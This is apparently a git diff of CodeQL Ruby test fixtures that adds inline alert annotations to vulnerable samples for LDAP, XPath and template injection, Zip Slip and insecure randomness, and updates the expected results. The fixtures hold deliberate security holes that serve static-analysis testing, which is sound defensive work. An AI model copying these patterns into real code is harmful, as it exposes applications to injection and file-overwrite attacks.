InsecureRandomness.rb:6:42:6:57 | call to rand | InsecureRandomness.rb:6:42:6:57 | call to rand | This uses a cryptographically insecure random number generated at $@ in a security context. | InsecureRandomness.rb:6:42:6:57 | call to rand | call to rand | diff --git a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.qlref b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.qlref index 8d04d2154257..e3c5fbbad504 100644 --- a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.qlref +++ b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.qlref @@ -1 +1,2 @@ -experimental/insecure-randomness/InsecureRandomness.ql \ No newline at end of file +query: experimental/insecure-randomness/InsecureRandomness.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.rb b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.rb index 116957137b56..fa7427b1c66d 100644 --- a/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.rb +++ b/ruby/ql/test/query-tests/experimental/InsecureRandomness/InsecureRandomness.rb @@ -3,7 +3,7 @@ def generate_password_1(length) chars = ('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a + ['!', '@', '#', '$', '%'] # BAD: rand is not cryptographically secure - password = (1..length).collect { chars[rand(chars.size)] }.join + password = (1..length).collect { chars[rand(chars.size)] }.join # $ Alert end def generate_password_2(length) diff --git a/ruby/ql/test/query-tests/experimental/LdapInjection/LdapInjection.rb b/ruby/ql/test/query-tests/experimental/LdapInjection/LdapInjection.rb index 966b26ef6364..ce4e848e59a1 100644 --- a/ruby/ql/test/query-tests/experimental/LdapInjection/LdapInjection.rb +++ b/ruby/ql/test/query-tests/experimental/LdapInjection/LdapInjection.rb @@ -2,11 +2,11 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is used directly as DN # (i.e a remote flow source) - dc = params[:dc] + dc = params[:dc] # $ Source # A string tainted by user input is used directly as search filter or attribute # (i.e a remote flow source) - name = params[:user_name] + name = params[:user_name] # $ Source # LDAP Connection ldap = Net::LDAP.new( @@ -22,20 +22,20 @@ def some_request_handler # BAD: user input is used as DN # where dc is unsanitized - ldap.search(base: "ou=people,dc=#{dc},dc=com", filter: "cn=George", attributes: [""]) + ldap.search(base: "ou=people,dc=#{dc},dc=com", filter: "cn=George", attributes: [""]) # $ Alert # BAD: user input is used as search filter # where name is unsanitized - ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=#{name}", attributes: [""]) + ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=#{name}", attributes: [""]) # $ Alert # BAD: user input is used as attribute # where name is unsanitized - ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=George", attributes: [name]) + ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=George", attributes: [name]) # $ Alert # BAD: user input is used as search filter # where name is unsanitized filter = Net::LDAP::Filter.eq('cn', name) - ldap.search(base: "ou=people,dc=example,dc=com", filter: filter, attributes: [""]) + ldap.search(base: "ou=people,dc=example,dc=com", filter: filter, attributes: [""]) # $ Alert # GOOD: user input is not used in the LDAP query result = ldap.search(base: "ou=people,dc=example,dc=com", filter: "cn=George", attributes: [""]) diff --git a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected index 1eec0daa4c4c..1e6ebba4f852 100644 --- a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected +++ b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.expected @@ -1,3 +1,8 @@ +#select +| LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | This LDAP query depends on a $@. | LdapInjection.rb:5:10:5:15 | call to params | user-provided value | +| LdapInjection.rb:29:62:29:73 | "cn=#{...}" | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:29:62:29:73 | "cn=#{...}" | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | +| LdapInjection.rb:33:87:33:92 | call to [] | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:33:87:33:92 | call to [] | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | +| LdapInjection.rb:38:62:38:67 | filter | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:38:62:38:67 | filter | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | edges | LdapInjection.rb:5:5:5:6 | dc | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | provenance | AdditionalTaintStep | | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:5:10:5:20 | ...[...] | provenance | | @@ -28,8 +33,3 @@ nodes | LdapInjection.rb:37:41:37:44 | name | semmle.label | name | | LdapInjection.rb:38:62:38:67 | filter | semmle.label | filter | subpaths -#select -| LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | LdapInjection.rb:5:10:5:15 | call to params | LdapInjection.rb:25:23:25:49 | "ou=people,dc=#{...},dc=com" | This LDAP query depends on a $@. | LdapInjection.rb:5:10:5:15 | call to params | user-provided value | -| LdapInjection.rb:29:62:29:73 | "cn=#{...}" | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:29:62:29:73 | "cn=#{...}" | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | -| LdapInjection.rb:33:87:33:92 | call to [] | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:33:87:33:92 | call to [] | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | -| LdapInjection.rb:38:62:38:67 | filter | LdapInjection.rb:9:12:9:17 | call to params | LdapInjection.rb:38:62:38:67 | filter | This LDAP query depends on a $@. | LdapInjection.rb:9:12:9:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.qlref b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.qlref index 7df75a91d969..f1164f044e6f 100644 --- a/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.qlref +++ b/ruby/ql/test/query-tests/experimental/LdapInjection/Ldapinjection.qlref @@ -1 +1,2 @@ -experimental/ldap-injection/LdapInjection.ql \ No newline at end of file +query: experimental/ldap-injection/LdapInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/ErbInjection.rb b/ruby/ql/test/query-tests/experimental/TemplateInjection/ErbInjection.rb index 41b9d7069530..a433e4d54363 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/ErbInjection.rb +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/ErbInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is inserted into a template # (i.e a remote flow source) - name = params[:name] + name = params[:name] # $ Source # Template with the source bad_text = " @@ -12,11 +12,11 @@ def some_request_handler # BAD: user input is evaluated # where name is unsanitized - template = ERB.new(bad_text).result(binding) + template = ERB.new(bad_text).result(binding) # $ Alert # BAD: user input is evaluated # where name is unsanitized - render inline: bad_text + render inline: bad_text # $ Alert # Template with the source good_text = " diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/SlimInjection.rb b/ruby/ql/test/query-tests/experimental/TemplateInjection/SlimInjection.rb index 07b93a20468b..05684b9454fa 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/SlimInjection.rb +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/SlimInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is inserted into a template # (i.e a remote flow source) - name = params[:name] + name = params[:name] # $ Source # Template with the source (no sanitizer) bad_text = " @@ -11,7 +11,7 @@ def some_request_handler " % name # BAD: renders user input # where text is unsanitized - Slim::Template.new{ bad_text }.render + Slim::Template.new{ bad_text }.render # $ Alert # Template with the source (no sanitizer) bad2_text = " @@ -20,7 +20,7 @@ def some_request_handler " # BAD: renders user input # where text is unsanitized - Slim::Template.new{ bad2_text }.render + Slim::Template.new{ bad2_text }.render # $ Alert # Template with the source (no render) good_text = " diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected index cdb6045d4daf..2355550b9328 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.expected @@ -1,3 +1,8 @@ +#select +| ErbInjection.rb:15:24:15:31 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:15:24:15:31 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | +| ErbInjection.rb:19:20:19:27 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:19:20:19:27 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | +| SlimInjection.rb:14:25:14:32 | bad_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:14:25:14:32 | bad_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | +| SlimInjection.rb:23:25:23:33 | bad2_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:23:25:23:33 | bad2_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | edges | ErbInjection.rb:5:5:5:8 | name | ErbInjection.rb:8:5:8:12 | bad_text | provenance | | | ErbInjection.rb:5:5:5:8 | name | ErbInjection.rb:11:11:11:14 | name | provenance | | @@ -35,8 +40,3 @@ nodes | SlimInjection.rb:23:23:23:35 | { ... } : [lambda] [captured bad2_text] : String | semmle.label | { ... } : [lambda] [captured bad2_text] : String | | SlimInjection.rb:23:25:23:33 | bad2_text | semmle.label | bad2_text | subpaths -#select -| ErbInjection.rb:15:24:15:31 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:15:24:15:31 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | -| ErbInjection.rb:19:20:19:27 | bad_text | ErbInjection.rb:5:12:5:17 | call to params | ErbInjection.rb:19:20:19:27 | bad_text | This template depends on a $@. | ErbInjection.rb:5:12:5:17 | call to params | user-provided value | -| SlimInjection.rb:14:25:14:32 | bad_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:14:25:14:32 | bad_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | -| SlimInjection.rb:23:25:23:33 | bad2_text | SlimInjection.rb:5:12:5:17 | call to params | SlimInjection.rb:23:25:23:33 | bad2_text | This template depends on a $@. | SlimInjection.rb:5:12:5:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.qlref b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.qlref index 38054e393eee..e783cc8cabbd 100644 --- a/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.qlref +++ b/ruby/ql/test/query-tests/experimental/TemplateInjection/TemplateInjection.qlref @@ -1 +1,2 @@ -experimental/template-injection/TemplateInjection.ql \ No newline at end of file +query: experimental/template-injection/TemplateInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/LibxmlInjection.rb b/ruby/ql/test/query-tests/experimental/XPathInjection/LibxmlInjection.rb index 3bde2f1e40b9..8a992b5ba36b 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/LibxmlInjection.rb +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/LibxmlInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def libxml_handler(event:, context:) - name = params[:user_name] + name = params[:user_name] # $ Source xml = <<-XML @@ -18,13 +18,13 @@ def libxml_handler(event:, context:) results1 = doc.find_first('//foo') # BAD: XPath query is constructed from user input - results2 = doc.find_first("//#{name}") + results2 = doc.find_first("//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input results3 = doc.find('//foo') # BAD: XPath query is constructed from user input - results4 = doc.find("//#{name}") + results4 = doc.find("//#{name}") # $ Alert end end diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/NokogiriInjection.rb b/ruby/ql/test/query-tests/experimental/XPathInjection/NokogiriInjection.rb index e3ac8055f486..89f5fa5e8444 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/NokogiriInjection.rb +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/NokogiriInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def nokogiri_handler(event:, context:) - name = params[:user_name] + name = params[:user_name] # $ Source xml = <<-XML @@ -18,19 +18,19 @@ def nokogiri_handler(event:, context:) results1 = doc.at('//foo') # BAD: XPath query is constructed from user input - results2 = doc.at("//#{name}") + results2 = doc.at("//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input results3 = doc.xpath('//foo') # BAD: XPath query is constructed from user input - results4 = doc.xpath("//#{name}") + results4 = doc.xpath("//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input results5 = doc.at_xpath('//foo') # BAD: XPath query is constructed from user input - results6 = doc.at_xpath("//#{name}") + results6 = doc.at_xpath("//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input doc.xpath('//foo').each do |element| @@ -38,7 +38,7 @@ def nokogiri_handler(event:, context:) end # BAD: XPath query constructed from user input - doc.xpath("//#{name}").each do |element| + doc.xpath("//#{name}").each do |element| # $ Alert puts element.text end @@ -48,7 +48,7 @@ def nokogiri_handler(event:, context:) end # BAD: XPath query constructed from user input - doc.search("//#{name}").each do |element| + doc.search("//#{name}").each do |element| # $ Alert puts element.text end end diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/RexmlInjection.rb b/ruby/ql/test/query-tests/experimental/XPathInjection/RexmlInjection.rb index 6ee16d125b43..5b850c70ad4d 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/RexmlInjection.rb +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/RexmlInjection.rb @@ -2,7 +2,7 @@ class FooController < ActionController::Base def rexml_handler(event:, context:) - name = params[:user_name] + name = params[:user_name] # $ Source xml = <<-XML @@ -18,13 +18,13 @@ def rexml_handler(event:, context:) results1 = REXML::XPath.first(doc, "//foo") # BAD: XPath query is constructed from user input - results2 = REXML::XPath.first(doc, "//#{name}") + results2 = REXML::XPath.first(doc, "//#{name}") # $ Alert # GOOD: XPath query is not constructed from user input results3 = REXML::XPath.match(doc, "//foo", nil) # BAD: XPath query is constructed from user input - results4 = REXML::XPath.match(doc, "//#{name}", nil) + results4 = REXML::XPath.match(doc, "//#{name}", nil) # $ Alert # GOOD: XPath query is not constructed from user input REXML::XPath.each(doc, "//foo") do |element| @@ -32,7 +32,7 @@ def rexml_handler(event:, context:) end # BAD: XPath query constructed from user input - REXML::XPath.each(doc, "//#{name}") do |element| + REXML::XPath.each(doc, "//#{name}") do |element| # $ Alert puts element.text end end diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected index 66ef14da3d7f..369a01c72f02 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.expected @@ -1,3 +1,14 @@ +#select +| LibxmlInjection.rb:21:31:21:41 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| LibxmlInjection.rb:27:25:27:35 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:21:23:21:33 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:21:23:21:33 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:27:26:27:36 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:27:26:27:36 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:33:29:33:39 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:33:29:33:39 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:41:15:41:25 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:41:15:41:25 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| NokogiriInjection.rb:51:16:51:26 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:51:16:51:26 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:21:40:21:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:21:40:21:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:27:40:27:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:27:40:27:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | +| RexmlInjection.rb:35:28:35:38 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:35:28:35:38 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | edges | LibxmlInjection.rb:5:5:5:8 | name | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | provenance | AdditionalTaintStep | | LibxmlInjection.rb:5:5:5:8 | name | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | provenance | AdditionalTaintStep | @@ -36,14 +47,3 @@ nodes | RexmlInjection.rb:27:40:27:50 | "//#{...}" | semmle.label | "//#{...}" | | RexmlInjection.rb:35:28:35:38 | "//#{...}" | semmle.label | "//#{...}" | subpaths -#select -| LibxmlInjection.rb:21:31:21:41 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:21:31:21:41 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| LibxmlInjection.rb:27:25:27:35 | "//#{...}" | LibxmlInjection.rb:5:12:5:17 | call to params | LibxmlInjection.rb:27:25:27:35 | "//#{...}" | XPath expression depends on a $@. | LibxmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:21:23:21:33 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:21:23:21:33 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:27:26:27:36 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:27:26:27:36 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:33:29:33:39 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:33:29:33:39 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:41:15:41:25 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:41:15:41:25 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| NokogiriInjection.rb:51:16:51:26 | "//#{...}" | NokogiriInjection.rb:5:12:5:17 | call to params | NokogiriInjection.rb:51:16:51:26 | "//#{...}" | XPath expression depends on a $@. | NokogiriInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:21:40:21:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:21:40:21:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:27:40:27:50 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:27:40:27:50 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | -| RexmlInjection.rb:35:28:35:38 | "//#{...}" | RexmlInjection.rb:5:12:5:17 | call to params | RexmlInjection.rb:35:28:35:38 | "//#{...}" | XPath expression depends on a $@. | RexmlInjection.rb:5:12:5:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.qlref b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.qlref index a5b1b23c2031..7ca9780f11c3 100644 --- a/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.qlref +++ b/ruby/ql/test/query-tests/experimental/XPathInjection/XPathInjection.qlref @@ -1 +1,2 @@ -experimental/xpath-injection/XpathInjection.ql \ No newline at end of file +query: experimental/xpath-injection/XpathInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected index 65ffe942e84d..926568e388d6 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected +++ b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.expected @@ -1,3 +1,10 @@ +#select +| zip_slip.rb:10:19:10:33 | call to full_name | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:10:19:10:33 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:8:15:8:54 | call to new | potentially untrusted source | +| zip_slip.rb:22:21:22:35 | call to full_name | zip_slip.rb:20:50:20:56 | tarfile | zip_slip.rb:22:21:22:35 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:20:50:20:56 | tarfile | potentially untrusted source | +| zip_slip.rb:47:17:47:26 | call to name | zip_slip.rb:46:5:46:24 | call to open | zip_slip.rb:47:17:47:26 | call to name | This file extraction depends on a $@. | zip_slip.rb:46:5:46:24 | call to open | potentially untrusted source | +| zip_slip.rb:58:19:58:28 | call to name | zip_slip.rb:56:30:56:37 | zip_file | zip_slip.rb:58:19:58:28 | call to name | This file extraction depends on a $@. | zip_slip.rb:56:30:56:37 | zip_file | potentially untrusted source | +| zip_slip.rb:100:21:100:30 | entry_path | zip_slip.rb:90:12:90:54 | call to open | zip_slip.rb:100:21:100:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:90:12:90:54 | call to open | potentially untrusted source | +| zip_slip.rb:126:21:126:30 | entry_path | zip_slip.rb:123:12:123:34 | call to new | zip_slip.rb:126:21:126:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:123:12:123:34 | call to new | potentially untrusted source | edges | zip_slip.rb:8:5:8:11 | tarfile | zip_slip.rb:9:5:9:11 | tarfile | provenance | | | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:8:5:8:11 | tarfile | provenance | | @@ -71,10 +78,3 @@ nodes | zip_slip.rb:125:22:125:36 | call to full_name | semmle.label | call to full_name | | zip_slip.rb:126:21:126:30 | entry_path | semmle.label | entry_path | subpaths -#select -| zip_slip.rb:10:19:10:33 | call to full_name | zip_slip.rb:8:15:8:54 | call to new | zip_slip.rb:10:19:10:33 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:8:15:8:54 | call to new | potentially untrusted source | -| zip_slip.rb:22:21:22:35 | call to full_name | zip_slip.rb:20:50:20:56 | tarfile | zip_slip.rb:22:21:22:35 | call to full_name | This file extraction depends on a $@. | zip_slip.rb:20:50:20:56 | tarfile | potentially untrusted source | -| zip_slip.rb:47:17:47:26 | call to name | zip_slip.rb:46:5:46:24 | call to open | zip_slip.rb:47:17:47:26 | call to name | This file extraction depends on a $@. | zip_slip.rb:46:5:46:24 | call to open | potentially untrusted source | -| zip_slip.rb:58:19:58:28 | call to name | zip_slip.rb:56:30:56:37 | zip_file | zip_slip.rb:58:19:58:28 | call to name | This file extraction depends on a $@. | zip_slip.rb:56:30:56:37 | zip_file | potentially untrusted source | -| zip_slip.rb:100:21:100:30 | entry_path | zip_slip.rb:90:12:90:54 | call to open | zip_slip.rb:100:21:100:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:90:12:90:54 | call to open | potentially untrusted source | -| zip_slip.rb:126:21:126:30 | entry_path | zip_slip.rb:123:12:123:34 | call to new | zip_slip.rb:126:21:126:30 | entry_path | This file extraction depends on a $@. | zip_slip.rb:123:12:123:34 | call to new | potentially untrusted source | diff --git a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.qlref b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.qlref index 2ecd57e4b2bc..a5b8c00322e5 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/ZipSlip.qlref @@ -1 +1,2 @@ -experimental/cwe-022-zipslip/ZipSlip.ql +query: experimental/cwe-022-zipslip/ZipSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/zip_slip.rb b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/zip_slip.rb index 4e5aa27d00a1..72c8c4701fcb 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/zip_slip.rb +++ b/ruby/ql/test/query-tests/experimental/cwe-022-ZipSlip/zip_slip.rb @@ -5,9 +5,9 @@ class TestController < ActionController::Base def tarReaderUnsafe path = params[:path] file_stream = IO.new(IO.sysopen(path)) - tarfile = Gem::Package::TarReader.new(file_stream) + tarfile = Gem::Package::TarReader.new(file_stream) # $ Source tarfile.each do |entry| - ::File.open(entry.full_name, "wb") do |os| + ::File.open(entry.full_name, "wb") do |os| # $ Alert entry.read end end @@ -17,9 +17,9 @@ def tarReaderUnsafe def tarReaderBlockUnsafe path = params[:path] file_stream = IO.new(IO.sysopen(path)) - Gem::Package::TarReader.new(file_stream) do |tarfile| + Gem::Package::TarReader.new(file_stream) do |tarfile| # $ Source tarfile.each_entry do |entry| - ::File.open(entry.full_name, "wb") do |os| + ::File.open(entry.full_name, "wb") do |os| # $ Alert entry.read end end @@ -43,8 +43,8 @@ def tarReadeSanitizedExpandPath # BAD def zipFileUnsafe path = params[:path] - Zip::File.open(path).each do |entry| - File.open(entry.name, "wb") do |os| + Zip::File.open(path).each do |entry| # $ Source + File.open(entry.name, "wb") do |os| # $ Alert entry.read end end @@ -53,9 +53,9 @@ def zipFileUnsafe # BAD def zipFileBlockUnsafe path = params[:path] - Zip::File.open(path) do |zip_file| + Zip::File.open(path) do |zip_file| # $ Source zip_file.each do |entry| - File.open(entry.name, "wb") do |os| + File.open(entry.name, "wb") do |os| # $ Alert entry.read end end @@ -87,7 +87,7 @@ def zipFileSanitizedConstCompare end def get_compressed_file_stream(compressed_file_path) - gzip = Zlib::GzipReader.open(compressed_file_path) + gzip = Zlib::GzipReader.open(compressed_file_path) # $ Source yield(gzip) end @@ -97,7 +97,7 @@ def gzipReaderUnsafe get_compressed_file_stream(path) do |compressed_file| compressed_file.each do |entry| entry_path = entry.full_name - ::File.open(entry_path, 'wb') do |os| + ::File.open(entry_path, 'wb') do |os| # $ Alert entry.read end end @@ -120,10 +120,10 @@ def gzipReaderSafeConstPath def gzipReaderUnsafeNewInstance path = params[:path] File.open(path, 'rb') do |f| - gz = Zlib::GzipReader.new(f) + gz = Zlib::GzipReader.new(f) # $ Source gz.each do |entry| entry_path = entry.full_name - ::File.open(entry_path, 'wb') do |os| + ::File.open(entry_path, 'wb') do |os| # $ Alert entry.read end end diff --git a/ruby/ql/test/query-tests/experimental/cwe-176/UnicodeBypassValidation.qlref b/ruby/ql/test/query-tests/experimental/cwe-176/UnicodeBypassValidation.qlref index 2faba2ebb125..1fe05308e87b 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-176/UnicodeBypassValidation.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-176/UnicodeBypassValidation.qlref @@ -1 +1 @@ -experimental/cwe-176/UnicodeBypassValidation.ql +query: experimental/cwe-176/UnicodeBypassValidation.ql diff --git a/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.qlref b/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.qlref index 3d034add0ba4..c6f2acf7d750 100644 --- a/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.qlref +++ b/ruby/ql/test/query-tests/experimental/cwe-347/EmptyJWTSecret.qlref @@ -1 +1,2 @@ -experimental/cwe-347/EmptyJWTSecret.ql \ No newline at end of file +query: experimental/cwe-347/EmptyJWTSecret.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git 